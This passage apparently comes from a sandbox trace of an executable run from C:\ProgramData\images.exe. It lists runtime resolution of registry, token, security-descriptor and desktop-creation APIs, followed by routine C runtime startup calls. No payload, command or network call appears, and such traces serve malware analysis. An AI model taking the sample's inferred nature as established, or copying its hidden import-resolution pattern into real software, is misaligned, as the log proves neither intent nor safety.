(hModule=0x75830000, lpProcName="RegSetValueExW") returned 0x7584f7f0 [0260.022] GetProcAddress (hModule=0x75830000, lpProcName="RegQueryValueExW") returned 0x7584f330 [0260.022] GetProcAddress (hModule=0x75830000, lpProcName="RegOpenKeyExW") returned 0x7584f350 [0260.023] GetProcAddress (hModule=0x75830000, lpProcName="RegDisablePredefinedCache") returned 0x758511d0 [0260.023] GetProcAddress (hModule=0x75830000, lpProcName="ConvertStringSidToSidW") returned 0x7584ddc0 [0260.023] GetProcAddress (hModule=0x75830000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x7584cbe0 [0260.023] GetProcAddress (hModule=0x75830000, lpProcName="ConvertSidToStringSidW") returned 0x7584f060 [0260.023] GetProcAddress (hModule=0x75830000, lpProcName="AccessCheck") returned 0x75851230 [0260.023] GetProcAddress (hModule=0x75830000, lpProcName="RegSetValueExA") returned 0x75850a20 [0260.023] GetProcAddress (hModule=0x75830000, lpProcName="RegOpenKeyExA") returned 0x7584f790 [0260.023] GetProcAddress (hModule=0x75830000, lpProcName="RegEnumKeyExA") returned 0x75851810 [0260.023] GetProcAddress (hModule=0x75830000, lpProcName="RegDeleteKeyA") returned 0x758504a0 [0260.023] GetProcAddress (hModule=0x75830000, lpProcName="RegCreateKeyExA") returned 0x7584fa60 [0260.024] GetProcAddress (hModule=0x75830000, lpProcName="RegCloseKey") returned 0x7584f620 [0260.024] GetProcAddress (hModule=0x75830000, lpProcName="SetTokenInformation") returned 0x75853840 [0260.024] GetProcAddress (hModule=0x75830000, lpProcName="SystemFunction036") returned 0x74482a60 [0260.024] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x749b0000 [0260.024] GetProcAddress (hModule=0x749b0000, lpProcName="GetTextExtentPoint32A") returned 0x74a5cf10 [0260.024] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x77660000 [0260.024] GetProcAddress (hModule=0x77660000, lpProcName="CoAddRefServerProcess") returned 0x77550d30 [0260.024] GetProcAddress (hModule=0x77660000, lpProcName="CoReleaseServerProcess") returned 0x77553950 [0260.024] GetProcAddress (hModule=0x77660000, lpProcName="CoCreateInstance") returned 0x77500060 [0260.024] GetProcAddress (hModule=0x77660000, lpProcName="StringFromCLSID") returned 0x7752dcf0 [0260.025] GetProcAddress (hModule=0x77660000, lpProcName="CoTaskMemFree") returned 0x774d9170 [0260.025] GetProcAddress (hModule=0x77660000, lpProcName="CoInitialize") returned 0x77691930 [0260.025] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x755e0000 [0260.025] GetProcAddress (hModule=0x755e0000, lpProcName=0xa2) returned 0x75605250 [0260.025] GetProcAddress (hModule=0x755e0000, lpProcName=0xa1) returned 0x755f38b0 [0260.025] GetProcAddress (hModule=0x755e0000, lpProcName=0x115) returned 0x755f4910 [0260.025] GetProcAddress (hModule=0x755e0000, lpProcName=0x7) returned 0x755f2640 [0260.025] GetProcAddress (hModule=0x755e0000, lpProcName=0x6) returned 0x755f9d40 [0260.025] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75c70000 [0260.026] GetProcAddress (hModule=0x75c70000, lpProcName="CommandLineToArgvW") returned 0x75e1bf80 [0260.026] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetFolderPathW") returned 0x75e14e80 [0260.026] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetKnownFolderPath") returned 0x75e19710 [0260.026] GetProcAddress (hModule=0x75c70000, lpProcName="SHGetFileInfoA") returned 0x75e28c50 [0260.026] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x756d0000 [0260.026] GetProcAddress (hModule=0x756d0000, lpProcName="CharNextA") returned 0x756fe240 [0260.026] GetProcAddress (hModule=0x756d0000, lpProcName="ShowWindow") returned 0x75708e60 [0260.026] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0260.027] GetProcAddress (hModule=0x756d0000, lpProcName="DestroyWindow") returned 0x744114e0 [0260.027] GetProcAddress (hModule=0x756d0000, lpProcName="PostThreadMessageA") returned 0x75704810 [0260.027] GetProcAddress (hModule=0x756d0000, lpProcName="GetDlgItem") returned 0x756fcc40 [0260.027] GetProcAddress (hModule=0x756d0000, lpProcName="AllowSetForegroundWindow") returned 0x75704b10 [0260.027] GetProcAddress (hModule=0x756d0000, lpProcName="ReleaseDC") returned 0x7440a580 [0260.064] GetProcAddress (hModule=0x756d0000, lpProcName="GetDC") returned 0x7440a680 [0260.064] GetProcAddress (hModule=0x756d0000, lpProcName="EnableWindow") returned 0x757029d0 [0260.065] GetProcAddress (hModule=0x756d0000, lpProcName="IsWindowVisible") returned 0x75705960 [0260.065] GetProcAddress (hModule=0x756d0000, lpProcName="SendMessageA") returned 0x756fa220 [0260.065] GetProcAddress (hModule=0x756d0000, lpProcName="RegisterClassW") returned 0x756e9800 [0260.065] GetProcAddress (hModule=0x756d0000, lpProcName="PostMessageW") returned 0x756ed700 [0260.065] GetProcAddress (hModule=0x756d0000, lpProcName="IsWindow") returned 0x756e8f70 [0260.065] GetProcAddress (hModule=0x756d0000, lpProcName="GetWindowThreadProcessId") returned 0x756eda50 [0260.065] GetProcAddress (hModule=0x756d0000, lpProcName="GetUserObjectInformationW") returned 0x75708fa0 [0260.066] GetProcAddress (hModule=0x756d0000, lpProcName="GetThreadDesktop") returned 0x75709110 [0260.066] GetProcAddress (hModule=0x756d0000, lpProcName="GetProcessWindowStation") returned 0x75708b10 [0260.066] GetProcAddress (hModule=0x756d0000, lpProcName="GetMessageW") returned 0x75704f60 [0260.066] GetProcAddress (hModule=0x756d0000, lpProcName="FindWindowExW") returned 0x75704110 [0260.066] GetProcAddress (hModule=0x756d0000, lpProcName="DispatchMessageW") returned 0x756e62e0 [0260.066] GetProcAddress (hModule=0x756d0000, lpProcName="DefWindowProcW") returned 0x744107e0 [0260.066] GetProcAddress (hModule=0x756d0000, lpProcName="CreateWindowStationW") returned 0x7572c280 [0260.066] GetProcAddress (hModule=0x756d0000, lpProcName="CreateWindowExW") returned 0x756e9860 [0260.067] GetProcAddress (hModule=0x756d0000, lpProcName="CreateDesktopW") returned 0x7572c200 [0260.067] GetProcAddress (hModule=0x756d0000, lpProcName="CloseWindowStation") returned 0x75709430 [0260.067] GetProcAddress (hModule=0x756d0000, lpProcName="CloseDesktop") returned 0x75709340 [0260.067] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0260.068] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0260.082] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff64 | out: lpSystemTimeAsFileTime=0x19ff64*(dwLowDateTime=0xbd0156aa, dwHighDateTime=0x1d86dce)) [0260.082] GetCurrentThreadId () returned 0xddc [0260.082] GetCurrentProcessId () returned 0xdd8 [0260.082] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff5c | out: lpPerformanceCount=0x19ff5c*=2210691978319) returned 1 [0260.082] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0260.085] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x75ac0000 [0260.085] GetProcAddress (hModule=0x75ac0000, lpProcName="InitializeCriticalSectionEx") returned 0x75b7d740 [0260.085] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x75ac0000 [0260.085] GetProcAddress (hModule=0x75ac0000, lpProcName="FlsAlloc") returned 0x75b84490 [0260.085] GetProcAddress (hModule=0x75ac0000, lpProcName="FlsSetValue") returned 0x75b7d7a0 [0260.097] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x75ac0000 [0260.097] GetProcAddress (hModule=0x75ac0000, lpProcName="InitializeCriticalSectionEx") returned 0x75b7d740 [0260.098] GetProcessHeap () returned 0x710000 [0260.098] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x75ac0000 [0260.098] GetProcAddress (hModule=0x75ac0000, lpProcName="FlsAlloc") returned 0x75b84490 [0260.098] GetLastError () returned 0xcb [0260.098] GetProcAddress (hModule=0x75ac0000, lpProcName="FlsGetValue") returned 0x75b6f350 [0260.098] GetProcAddress (hModule=0x75ac0000, lpProcName="FlsSetValue") returned 0x75b7d7a0 [0260.098] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x364) returned 0x729190 [0260.099] SetLastError (dwErrCode=0xcb) [0260.099] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xc00) returned 0x72a640 [0260.102] GetStartupInfoW (in: lpStartupInfo=0x19fe98 | out: lpStartupInfo=0x19fe98*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\ProgramData\\images.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x408b30, hStdOutput=0xb005229, hStdError=0xfffffffe)) [0260.102] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0260.102] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0260.102] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0260.102] GetCommandLineA () returned="\"C:\\ProgramData\\images.exe\" " [0260.102] GetCommandLineW () returned="\"C:\\ProgramData\\images.exe\" " [0260.103] GetACP () returned 0x4e4 [0260.103] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x220) returned 0x727d88 [0260.199] IsValidCodePage (CodePage=0x4e4) returned 1 [0260.199] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19feb8 | out: lpCPInfo=0x19feb8) returned 1 [0260.199] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f780 | out: lpCPInfo=0x19f780) returned 1 [0260.199] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0260.199] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x19f518, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0260.199] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x19f794 | out: lpCharType=0x19f794) returned 1 [0260.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0260.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x19f4c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0260.201] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x75ac0000 [0260.202] GetProcAddress (hModule=0x75ac0000, lpProcName="LCMapStringEx") returned 0x75b695f0 [0260.202] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0260.202] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f2b8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0260.202] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x19fc94, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÙ¬[\x0bÐþ\x19", lpUsedDefaultChar=0x0) returned 256 [0260.202] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0260.202] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd94, cbMultiByte=256, lpWideCharStr=0x19f4e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0260.202] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0260.202] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x19f2d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0260.202] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x19fb94, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÙ¬[\x0bÐþ\x19", lpUsedDefaultChar=0x0) returned 256 [0260.206] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x80) returned 0x71f370 [0260.206] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x54c488, nSize=0x104 | out: lpFilename="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe")) returned 0x19 [0260.206] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x22) returned 0x71f1a0 [0260.206] RtlInitializeSListHead (in: ListHead=0x54c3c0 | out: ListHead=0x54c3c0) [0260.206] GetLastError () returned 0x0 [0260.206] SetLastError (dwErrCode=0x0) [0260.206] GetEnvironmentStringsW () returned 0x72b248* [0260.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1321, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1321 [0260.206] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x529) returned 0x72bca8 [0260.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1321, lpMultiByteStr=0x72bca8, cbMultiByte=1321, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1321 [0260.339] FreeEnvironmentStringsW (penv=0x72b248) returned 1 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x94) returned 0x722a90 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x1f) returned 0x71aaa0 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x2e) returned 0x71f7d0 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x37) returned 0x725798 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x3c) returned 0x722580 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x31) returned 0x7257d8 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x14) returned 0x71a3a0 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x24) returned 0x71f1d0 [0260.339] 